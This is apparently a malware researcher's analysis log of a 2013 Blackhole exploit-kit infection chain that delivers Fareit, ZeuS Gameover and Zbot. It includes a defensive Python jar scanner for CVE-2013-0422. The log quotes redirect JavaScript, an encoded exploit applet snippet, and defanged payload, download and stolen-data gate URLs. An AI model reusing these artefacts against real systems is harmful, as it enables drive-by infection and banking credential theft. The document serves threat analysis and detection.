- // #MalwareMustDie! The Blackhole infection
- // via Incoming FAX Report Spam
- // Same method of infection as: previous post http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
- // No Medfos found this time; a Zbot Agent/downloader was grabbed.
- // Sample: http://www.mediafire.com/?6p5al38dlxdlchr
- // @unixfreaxjp ~]$ date
- // Thu Sep 19 21:22:54 JST 2013
- --2013-09-19 18:59:58-- h00p://oakadventures.com/widow/index.html
- Resolving oakadventures.com... seconds 0.00, 50.63.73.1
- Caching oakadventures.com => 50.63.73.1
- Connecting to oakadventures.com|50.63.73.1|:80... seconds 0.00, connected.
- :
- GET /widow/index.html HTTP/1.0
- Host: oakadventures.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Thu, 19 Sep 2013 10:00:01 GMT
- Server: Apache
- Accept-Ranges: bytes
- Vary: Accept-Encoding
- Content-Length: 442
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- :
- 200 OK
- Length: 442 [text/html]
- Saving to: `index.html'
- 2013-09-19 18:59:59 (14.5 MB/s) - `index.html' saved [442/442]
- // cat...
- <script type="text/javascript" src="h00p://0068421.netsolhost.com/partisanship/poached.js"></script>
- <script type="text/javascript" src="h00p://ade-data.com/exuded/midyear.js"></script>
- <script type="text/javascript" src="h00p://fangstudios.com/macedonian/piles.js"></script>
- --2013-09-19 19:01:57-- h00p://0068421.netsolhost.com/partisanship/poached.js
- Resolving 0068421.netsolhost.com... seconds 0.00, 206.188.192.64
- Caching 0068421.netsolhost.com => 206.188.192.64
- Connecting to 0068421.netsolhost.com|206.188.192.64|:80... seconds 0.00, connected.
- :
- GET /partisanship/poached.js HTTP/1.0
- Referer: malwaremustdie.org
- Host: 0068421.netsolhost.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Thu, 19 Sep 2013 10:01:57 GMT
- Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
- Last-Modified: Thu, 19 Sep 2013 10:00:12 GMT
- ETag: "e84aac-47-4e6b99ea839fb"
- Accept-Ranges: bytes
- Content-Length: 71
- Keep-Alive: timeout=3, max=200
- Connection: Keep-Alive
- Content-Type: application/javascript
- :
- 200 OK
- Length: 71 [application/javascript]
- Saving to: `poached.js'
- 2013-09-19 19:01:58 (2.02 MB/s) - `poached.js' saved [71/71]
- // cat...
- document.location='h00p://louievozza.com/topic/seconds-exist-foot.php';
- // ZA LANDING PAGE ..
- --2013-09-19 19:03:48-- h00p://louievozza.com/topic/seconds-exist-foot.php
- Resolving louievozza.com... seconds 0.00, 174.140.169.145
- Caching louievozza.com => 174.140.169.145
- Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
- :
- GET /topic/seconds-exist-foot.php HTTP/1.0
- Referer: malwaremustdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:03:47 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- :
- 200 OK
- Length: unspecified [text/html]
- Saving to: `seconds-exist-foot.php'
- 2013-09-19 19:03:51 (44.2 KB/s) - `seconds-exist-foot.php' saved [69693]
- // Had three exploitations... see pic.
- // JNLP goes here:
- <applet width=\"1\" height=\"1\"><param name=\"jnlp_href\" value=\"!G28!!1bbaI.jnlp\"/><PA
- RAM name=\"jnlp_embedded\" value=\"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gDQo
- 8am5scCBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPiANCjxpbmZvcm1hdGlvbj4gDQo8d
- Gl0bGU+Sk5MUDwvdGl0bGU+IA0KPHZlbmRvcj5KTkxQPC92ZW5kb3I+IA0KPGRlc2NyaXB0aW9uPkpOTFA8L2Rlc2N
- yaXB0aW9uPiANCjxvZmZsaW5lLWFsbG93ZWQvPiANCjwvaW5mb3JtYXRpb24+IA0KPHJlc291cmNlcz4gDQoJPGoyc
- 2UgdmVyc2lvbj0iMS42KyIgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIvPiA
- NCgk8amFyIGhyZWY9Ii90b3BpYy9zZWNvbmRzLWV4aXN0LWZvb3QucGhwPzN3ITBfXz04VkN4aTV4JjghTV8hbVItN
- SoyNFNMPUQqXzU2IiBtYWluPSJ0cnVlIi8+IA0KPC9yZXNvdXJjZXM+IA0KPGFwcGxldC1kZXNjIG5hbWU9IkpuIiB
- tYWluLWNsYXNzPSJNYWluIiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj4NCiA8cGFyYW0gdmFsdWU9InRydWUiIG5hbWU9I
- l9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiPjwvcGFyYW0+IA0KPC9hcHBsZXQtZGVzYz4gDQo8L2pubHA+\"/><param
- name=\"prime\" value=\"iym.ttyw3D3x6NNmmZ8N0Dmcb_c_MrMr%_?RK2ifchb_%_rre_BrVrcre_V
- re_BR4=cLGE9rLSb__RP6&r4yB8fJbrpmU5_8#RqNcmbNhvpL1ahfYuPhOODyy3Ojj-tK8evtUUVw%t0jyt38&
- #37;jie%toMimek8iym.ttyw3D3x5s6L1M6b_c_MrMr%_?RXaNfrb___B__r%rV_c_r_M_B__Rvs4m
- sU/=Bb__RcKfBJ1NThLbI6AfzdLPrP-RNif64mzobPDNF%Ai\"></param><param value=\"Dyy3Ojj-tK8e
- vtUUVw%t0jyt38%jie%toMimek8\" name=\"val\"/><param name=\"duFJfXw\" value=\"ht
- tp://louievozza.com/topic/seconds-exist-foot.php?1__--Mi_m*h-9=w9wd8d8cwb&uKs092=wcw88ew78
- a898ewa8ew7&5H94!FCN84y=ww&61U85*t7i0I=8Q-zVw*iX&k_9!-=_2vQ!43R20LB62::h00p://louievozza.c
- om/topic/seconds-exist-foot.php?V!G1!43d1=w9wd8d8cwb&OR_*08!=www7ww8c8aw9w8wdw7ww&v!*G5-*G
- zTH7=ww&9u0!7I*3_P!24=W1g*0DS468*!6l&_!s015-D!n=6h_(qcgs!\"></param></applet>";
- // Non-JNLP goes here:
- "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
- "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
- --2013-09-19 19:26:21-- h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56
- Resolving louievozza.com... seconds 0.00, 174.140.169.145
- Caching louievozza.com => 174.140.169.145
- Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
- :
- GET /topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56 HTTP/1.0
- Referer: malwareMUSTdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:26:20 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- Content-Length: 30699
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- ETag: "71c92ebc2a889d3541ff6f20b4740868"
- Last-Modified: Thu, 19 Sep 2013 10:26:19 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Registered socket 1896 for persistent reuse.
- Length: 30699 (30K) [application/java-archive]
- Saving to: `java1.jar'
- 2013-09-19 19:26:24 (36.4 KB/s) - `java1.jar' saved [30699/30699]
- // Is a CVE-2013-0422... I saw this before...where? hmm..
- // getMBeanInstantiator
- // com.sun.jmx.mbeanserver.Introspector
- // javax.management.MbeanServerDelegateboolean
- // com.sun.jmx.mbeanserver.JmxMBeanServer
- // newMBeanServer
- // :
- // ah.. the same as previous findings (Doh!)
- // Link: http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
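A quick way to confirm an "I saw this before" hunch without opening a decompiler: the class and method names listed above survive as strings in the jar's class files, so a byte search over the members is enough for first-pass triage. The Python below is an added example, not the author's tooling. java1.jar is not embedded here, so `build_sample_jar()` constructs a stand-in jar whose fake class carries the same strings; the indicator list is taken from the notes above and the function names are mine. Inside a .class file a class reference is stored in the internal `/`-separated form, not the dotted form a decompiler prints, so both spellings are checked.

```python
import io
import zipfile

# Indicator strings from the notes above, in the dotted form a decompiler shows.
CVE_2013_0422_INDICATORS = (
    "getMBeanInstantiator",
    "com.sun.jmx.mbeanserver.Introspector",
    "com.sun.jmx.mbeanserver.JmxMBeanServer",
    "newMBeanServer",
)


def name_forms(indicator: str) -> set:
    """Dotted (decompiler) and internal '/'-separated (constant pool) spellings."""
    return {indicator, indicator.replace(".", "/")}


def scan_member(data: bytes, indicators=CVE_2013_0422_INDICATORS) -> list:
    """Indicators whose bytes (in either spelling) occur in one jar member."""
    return [i for i in indicators if any(f.encode() in data for f in name_forms(i))]


def scan_jar(jar_bytes: bytes, indicators=CVE_2013_0422_INDICATORS) -> dict:
    """Map each indicator to the jar members that contain it."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            for ind in scan_member(zf.read(info), indicators):
                findings.setdefault(ind, []).append(info.filename)
    return findings


def looks_like_cve_2013_0422(findings: dict, minimum: int = 3) -> bool:
    """JmxMBeanServer alone is ordinary JMX code; require several indicators together."""
    return len(findings) >= minimum


def build_sample_jar() -> bytes:
    """Constructed stand-in for java1.jar (not a valid class file, just the strings)."""
    fake_class = b"\xca\xfe\xba\xbe\x00\x00\x00\x32" + b"\x00".join(
        s.encode() for s in (
            "com/sun/jmx/mbeanserver/JmxMBeanServer",
            "newMBeanServer",
            "getMBeanInstantiator",
            "com/sun/jmx/mbeanserver/Introspector",
        )
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Main.class", fake_class)
        zf.writestr("Helper.class", b"\xca\xfe\xba\xbe\x00\x00\x00\x32java/lang/Object")
    return buf.getvalue()


if __name__ == "__main__":
    hits = scan_jar(build_sample_jar())
    for ind, members in hits.items():
        print(f"{ind}: {', '.join(members)}")
    print("CVE-2013-0422 pattern:", looks_like_cve_2013_0422(hits))
```

`JmxMBeanServer` and `newMBeanServer` on their own are legitimate JMX usage; it is the combination with `getMBeanInstantiator` and `Introspector` in a tiny applet that points at CVE-2013-0422, which is why the verdict requires several hits rather than one. A kit that encrypts its strings or builds class names at runtime defeats this check entirely, and that is where the decompiler comes back in; the sample here evidently left them in the clear.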
- // To make a long story short... payload:
- h00p://louievozza.com/adobe/update_flash_player.exe
- GET /adobe/update_flash_player.exe HTTP/1.0
- Referer: malwaremustdie.org
- Host: louievozza.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Thu, 19 Sep 2013 10:30:55 GMT
- Content-Type: application/octet-stream
- Connection: keep-alive
- Content-Length: 113664
- Last-Modified: Thu, 19 Sep 2013 10:30:01 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Registered socket 1896 for persistent reuse.
- Length: 113664 (111K) [application/octet-stream]
- Saving to: `update_flash_player.exe'
- 2013-09-19 19:31:00 (50.8 KB/s) - `update_flash_player.exe' saved [113664/113664]
- // This is the usual Win32/Fareit
- VT: https://www.virustotal.com/en/file/7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d/analysis/1379589491/
- SHA256: 7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d
- SHA1: 5e7a2032fea221beae9d509f92061ab0f1ae6578
- MD5: c08233e8051214fd65db330ca8b9dd6c
- File size: 111.0 KB ( 113664 bytes )
- File name: sample1.exe
- File type: Win32 EXE
- Detection ratio: 14 / 48
- Analysis date: 2013-09-19 11:18:11 UTC ( 0 minutes ago )
- The gates to post the stolen data..
- h00p://louievozza.com/forum/viewtopic.php
- h00p://louvozza.com/forum/viewtopic.php
- h00p://lv-contracting.com/forum/viewtopic.php
- h00p://lvconcordecontracting.com/forum/viewtopic.php
- The downloads for the others..
- h00p://arya-foundation.de/6Zt.exe
- h00p://jaycees.co.uk/zHHgp2.exe
- h00p://familiapaixao.coconet-us.com/tmMTo.exe
- h00p://www.maschinen.be/gMYiQdv.exe
- // The ZeuS Gameover...(downloaded by Fareit)
- URL: https://www.virustotal.com/en/file/a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9/analysis/1379589455/
- SHA256: a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9
- SHA1: 61ce0ab07b794de746755a5bb1b53fc079c62b19
- MD5: 674b386f0cb0acec8ea8af4cd7c431c6
- File size: 300.5 KB ( 307712 bytes )
- File name: oqxub.exe
- File type: Win32 EXE
- Detection ratio: 9 / 48
- Analysis date: 2013-09-19 11:17:35 UTC ( 0 minutes ago )
- target injections:
- launchpadshell.exe
- dirclt32.exe
- wtng.exe
- prologue.exe
- pcsws.exe
- fdmaster.exe
- // brute logins..
- bancline
- fidelity
- micrsolv
- bankman
- vantiv
- episys
- jack henry
- cruisenet
- gplusmain
- // Zbot Trojan/Agent..
- URL: https://www.virustotal.com/en/file/efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589/analysis/1379589429/
- SHA256: efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589
- SHA1: 24ee0efe80d4ddb5e5559df79aacd35f41e56f88
- MD5: 5b95cc82cbec4f5705c10d13d59874a6
- File size: 43.0 KB ( 44078 bytes )
- File name: ydYGTvG.exe
- File type: Win32 EXE
- Detection ratio: 20 / 48
- Analysis date: 2013-09-19 11:17:09 UTC ( 0 minutes ago )
- Reg: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders
- Downloaded (driver)
- File name IvrufsinNomz.dll
- File Size 13824 bytes
- File Type PE32 (DLL) (GUI) x386
- MD5 b9bc7440d733e4346d45011ea649c6e4
- Connection:
- YAhoO.Com 98.139.183.24
- mta6.am0.yahoodns.net 66.196.118.34
- HOtMaIl.cOM 157.55.152.112
- mx2.HOtMaIl.cOM 65.55.37.104
- ---
- #MalwareMUSTDiee!!!
- @unixfreaxjp